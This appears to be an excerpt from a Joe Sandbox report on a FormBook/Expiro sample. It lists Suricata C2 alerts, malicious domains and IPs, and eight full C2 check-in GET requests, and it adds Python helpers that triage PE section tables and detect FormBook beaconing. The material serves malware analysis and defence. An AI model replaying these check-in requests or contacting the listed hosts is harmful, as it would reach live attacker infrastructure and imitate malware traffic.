Source: C:\Windows\SysWOW64\bitsadmin.exe, Code function 7_2_0327C640: FindFirstFileW, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\bitsadmin.exe, Code function 7_2_03269E80: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\bitsadmin.exe, Code function 7_2_038804FE: 4x nop then mov ebx, 00000004h
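The three system binaries the sample overwrites (armsvc.exe, alg.exe, AppVClient.exe) are flagged as W32/Infector.Gen, and the signature list notes "PE file contains sections with non-standard names". A responder triaging a host for this kind of file infection wants a quick, dependency-free check of the section table: an unfamiliar section name, a section that is both writable and executable, and an entry point that has been moved into the last section are the usual traces of an appending infector. The script below implements that check in pure Python and includes a constructed minimal PE builder so it can be exercised offline; it is an added example, not part of the Joe Sandbox report, and says nothing about how this particular sample infects files. The section name ".isz" in the test image is hypothetical. Packed binaries (UPX0, .vmp0 and similar) trip the name check by design, so treat a hit as a reason to pull the file, not as a verdict.

```python
"""Section-table heuristics for appending-infector triage. Added example; the
minimal PE builder exists only to make the checks testable offline."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section names a stock MSVC/Windows build is expected to carry (lower-cased).
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                     ".pdata", ".bss", ".tls", ".crt", ".textbss", ".didat", ".gfids",
                     ".00cfg", ".rodata", ".sdata", ".xdata", ".debug"}


def parse_sections(data: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE image in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    secs = []
    for i in range(nsec):
        off = opt + size_opt + 40 * i                     # IMAGE_SECTION_HEADER
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        secs.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                     "vsize": vsize, "raw_size": rawsize, "raw_ptr": rawptr, "chars": chars})
    return entry_rva, secs


def infector_indicators(data: bytes):
    """Human-readable findings; an empty list means the section table looks stock."""
    entry_rva, secs = parse_sections(data)
    findings, ep_sec = [], None
    for s in secs:
        span = max(s["vsize"], s["raw_size"])
        if s["vaddr"] <= entry_rva < s["vaddr"] + span:
            ep_sec = s
        if s["name"].lower() not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {s['name']!r}")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {s['name']!r} is writable and executable")
    if ep_sec is None:
        findings.append("entry point outside every section")
    elif secs and ep_sec is secs[-1] and ep_sec["name"].lower() != ".text":
        findings.append(f"entry point in last section {ep_sec['name']!r}")
    return findings


def scan_file(path: str):
    with open(path, "rb") as fh:
        return infector_indicators(fh.read())


def build_pe(sections, entry_rva):
    """Constructed minimal PE32 (headers + section table only) for offline testing.
    sections: (name, vaddr, vsize, raw_size, characteristics)."""
    size_opt, e_lfanew = 0xE0, 0x40
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    tbl = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"),
                               vs, va, rs, 0, 0, 0, 0, 0, ch)
                   for n, va, vs, rs, ch in sections)
    return bytes(hdr) + b"PE\0\0" + coff + bytes(opt) + tbl


# Stock layout versus the same file with a hypothetical RWX ".isz" section appended
# and the entry point redirected into it.
CLEAN_SECTIONS = [(".text", 0x1000, 0x2000, 0x2000, 0x60000020),
                  (".rdata", 0x3000, 0x1000, 0x1000, 0x40000040),
                  (".data", 0x4000, 0x1000, 0x1000, 0xC0000040)]
INFECTED_SECTIONS = CLEAN_SECTIONS + [(".isz", 0x5000, 0x800, 0x800, 0xE0000020)]

if __name__ == "__main__":
    print("clean:   ", infector_indicators(build_pe(CLEAN_SECTIONS, 0x1100)))
    print("infected:", infector_indicators(build_pe(INFECTED_SECTIONS, 0x5010)))
```

Run `scan_file()` against the three paths named above on a suspect host and compare against a known-good copy of the same Windows build; the heuristics are deliberately loose, so the known-good comparison is what turns a finding into a conclusion.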

Networking

Source: Network traffic, Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49706 -> 18.141.10.107:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 154.88.22.101:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49753 -> 20.2.249.7:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 104.21.95.160:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49746 -> 209.74.77.107:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49746 -> 209.74.77.107:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49730 -> 185.27.134.144:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49716 -> 23.225.160.132:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49730 -> 185.27.134.144:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49716 -> 23.225.160.132:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49751 -> 20.2.249.7:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 156.251.17.224:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49720 -> 149.88.81.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49720 -> 149.88.81.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 185.27.134.144:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49738 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49738 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49748 -> 104.21.48.1:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 23.225.160.132:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49745 -> 209.74.77.107:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 149.88.81.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49711 -> 161.97.142.144:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49711 -> 161.97.142.144:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 185.27.134.144:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 209.74.77.107:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49741 -> 154.88.22.101:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 23.225.160.132:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 23.225.160.132:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 104.21.95.160:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49754 -> 20.2.249.7:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49754 -> 20.2.249.7:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 185.27.134.144:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 149.88.81.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49744 -> 209.74.77.107:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49749 -> 104.21.48.1:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49737 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49752 -> 20.2.249.7:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 149.88.81.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49726 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49726 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49742 -> 154.88.22.101:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49742 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49750 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49750 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49734 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49734 -> 104.21.95.160:80
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: DNS query: www.duwixushx.xyz
                Source: Joe Sandbox View | IP Address: 149.88.81.190
                Source: Joe Sandbox View | IP Address: 161.97.142.144 (listed twice)
                Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49705
                Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49705
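A triage helper, added here as an example and not part of the Joe Sandbox report, that parses alert lines of the form above and rolls them up into one record per external host. Its sample input is constructed from five of the lines on this page. The two AnubisNetworks sinkhole alerts matter for the parser: they fire on the reply, so 54.244.188.177 sits in the source column while the sandbox VM is the destination. The helper therefore picks the external side by address (assuming the VM lives in RFC 1918 space, as 192.168.2.8 does) rather than by column, and keeps sinkhole hits apart from the live C2 indicators.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a handful of the Suricata lines from the report above,
# one event per line as the report presents them, plus one non-alert line.
# The sinkhole entry is included on purpose: it fires on the reply
# (external host -> sandbox VM), so its columns are swapped relative to the
# FormBook check-ins.
SAMPLE_ALERTS = """\
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 23.225.160.132:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49711 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49711 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 23.225.160.132:80
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49705
Source: DNS query: www.soainsaat.xyz
"""

# Only the text from "Suricata IDS:" onward is matched, so whatever precedes it
# on the line (the "Source" cell, with or without a separator) does not matter.
ALERT_RE = re.compile(
    r"Suricata IDS:\s*(?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)


def parse_alert(line):
    """Return the fields of one alert line, or None for any other report line."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    d = m.groupdict()
    for key in ("sid", "sev", "sport", "dport"):
        d[key] = int(d[key])
    return d


def external_endpoint(alert):
    """Pick the non-private side of the flow and say which way the alert fired.

    Assumption: the sandbox VM is in RFC 1918 space, so the public address is
    the one worth recording no matter which column it appears in.
    """
    src_private = ipaddress.ip_address(alert["src"]).is_private
    dst_private = ipaddress.ip_address(alert["dst"]).is_private
    if src_private and not dst_private:
        return alert["dst"], alert["dport"], "outbound"
    if dst_private and not src_private:
        return alert["src"], alert["sport"], "inbound"
    return None  # both sides private or both public: undecidable from addresses alone


def summarize(text):
    """Roll the alert lines of a report up into one record per external host."""
    hosts = defaultdict(lambda: {"sids": set(), "ports": set(), "alerts": 0,
                                 "directions": set(), "kind": set()})
    for line in text.splitlines():
        alert = parse_alert(line)
        if alert is None:
            continue
        ep = external_endpoint(alert)
        if ep is None:
            continue
        ip, port, direction = ep
        rec = hosts[ip]
        rec["sids"].add(alert["sid"])
        rec["ports"].add(port)
        rec["alerts"] += 1
        rec["directions"].add(direction)
        # A sinkhole reply means that domain was already taken over: useful
        # context, but not an address to block as live C2.
        rec["kind"].add("sinkhole" if "Sinkhole" in alert["msg"] else "c2")
    return dict(hosts)


def c2_iocs(text):
    """External hosts that triggered C2 check-in alerts, sorted for an IOC list."""
    return sorted(ip for ip, rec in summarize(text).items() if "c2" in rec["kind"])


if __name__ == "__main__":
    for ip, rec in summarize(SAMPLE_ALERTS).items():
        print(ip, sorted(rec["sids"]), rec["alerts"],
              sorted(rec["directions"]), sorted(rec["kind"]))
    print("block:", c2_iocs(SAMPLE_ALERTS))
```

Run over the full alert list above, the rollup shows which destinations fired both the GET (2050745/2855465) and the POST (2855464) signatures on the same flow; the two Cloudflare addresses (104.21.x.x, 188.114.97.3) are shared hosting and should be reported as domains rather than blocked by IP.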
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (17 identical entries collapsed)
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_004722EE
                Source: global traffic | HTTP traffic detected: GET /xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.nb-shenshi.buzz | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic | HTTP traffic detected: GET /sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.laohub10.net | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic | HTTP traffic detected: GET /rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.xcvbj.asia | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic | HTTP traffic detected: GET /rum2/?jNn=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnjZcvZIWQQve7723Pk1HFbXKcmbX65Etfa2fBZEFB8aOdg==&3P=ZxaxIFQ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.soainsaat.xyz | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic | HTTP traffic detected: GET /d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.amayavp.xyz | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic | HTTP traffic detected: GET /vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.vayui.top | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic | HTTP traffic detected: GET /o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.rgenerousrs.store | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global traffic | HTTP traffic detected: GET /jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.t91rl7.pro | Connection: close | User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
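The eight GET requests above share one shape: a four-character directory, a query of exactly two parameters (a short fixed token, 3P=ZxaxIFQ, and a 132-character base64 blob under jNn that decodes to 97 bytes in every request), Connection: close, and a UCWEB feature-phone User-Agent sent from a Windows VM, each to a different www.* host. The detector below is an added example, not part of the Joe Sandbox report: it parses such requests and scores them on those four traits without keying on the parameter names. The thresholds and the User-Agent test are derived from this one sample and are assumptions about FormBook traffic generally; the sample messages are constructed from two of the requests above, with an ordinary browser request as a negative control.

```python
import base64
import binascii
import re

# Constructed samples: two of the GET requests from the report above, rebuilt as
# complete HTTP messages (the report flattens the headers onto one line), plus
# an ordinary browser request as a negative control.
UA = ("UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 "
      "UCBrowser/9.9.0.543 U2/1.0.0 Mobile")
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,"
          "image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7")
CHECKIN_1 = (
    "GET /xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/"
    "lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ== HTTP/1.1\r\n"
    f"Accept: {ACCEPT}\r\nAccept-Language: en-US\r\nHost: www.nb-shenshi.buzz\r\n"
    f"Connection: close\r\nUser-Agent: {UA}\r\n\r\n"
)
CHECKIN_2 = (
    "GET /sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQ"
    "Bq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ HTTP/1.1\r\n"
    f"Accept: {ACCEPT}\r\nAccept-Language: en-US\r\nHost: www.laohub10.net\r\n"
    f"Connection: close\r\nUser-Agent: {UA}\r\n\r\n"
)
BENIGN = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/120.0 Safari/537.36\r\n\r\n"
)

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")             # /xxr1/, /sgdd/, ... as seen above
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,12}$")        # the short fixed value (ZxaxIFQ above)
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{60,}={0,2}$")  # long base64 payload, not URL-encoded


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query pairs and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    # Split on the first '=' only and do no percent-decoding: urllib's parse_qs
    # would turn the '+' inside the blob into a space and drop the '==' padding.
    params = [tuple(pair.partition("=")[::2]) for pair in query.split("&") if pair]
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params, "headers": headers}


def is_base64_blob(value):
    """True for a long value that is syntactically valid base64 (padding included)."""
    if not BLOB_RE.match(value):
        return False
    try:
        base64.b64decode(value, validate=True)
    except binascii.Error:
        return False
    return True


def decoded_blob_length(req):
    """Byte length of the base64 parameter, or None when the request has none."""
    for _, v in req["params"]:
        if is_base64_blob(v):
            return len(base64.b64decode(v))
    return None


def formbook_checkin_score(req):
    """Score 0..4 plus the reasons that fired. Heuristic derived from the eight
    GETs in this report; the User-Agent test is specific to this sample (assumption)."""
    reasons = []
    h = req["headers"]
    values = [v for _, v in req["params"]]
    if req["method"] == "GET" and PATH_RE.match(req["path"]):
        reasons.append("four-character directory path")
    if (len(values) == 2 and any(TOKEN_RE.match(v) for v in values)
            and any(is_base64_blob(v) for v in values)):
        reasons.append("short fixed token plus long base64 blob in query")
    if h.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    ua = h.get("user-agent", "")
    if ua.startswith("UCWEB/") or "MIDP" in ua:
        reasons.append("feature-phone User-Agent (UCWEB/MIDP) from a desktop host")
    return len(reasons), reasons


def is_formbook_checkin(raw, threshold=3):
    return formbook_checkin_score(parse_request(raw))[0] >= threshold


def hosts_contacted(raws, threshold=3):
    """Every Host that received a check-in-shaped request, as a sorted set."""
    return sorted({parse_request(r)["headers"].get("host", "?")
                   for r in raws if is_formbook_checkin(r, threshold)})


if __name__ == "__main__":
    for raw in (CHECKIN_1, CHECKIN_2, BENIGN):
        req = parse_request(raw)
        print(req["headers"].get("host"), formbook_checkin_score(req), decoded_blob_length(req))
    print(hosts_contacted([CHECKIN_1, CHECKIN_2, BENIGN]))
```

FormBook is documented to cycle through a list of domains of which most are decoys, and this report shows thirteen www.* DNS queries followed by 404 replies from several of them; hosts_contacted therefore reports the whole set of hosts rather than stopping at the first hit, and a 404 from any single host says nothing about whether it is the live C2.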
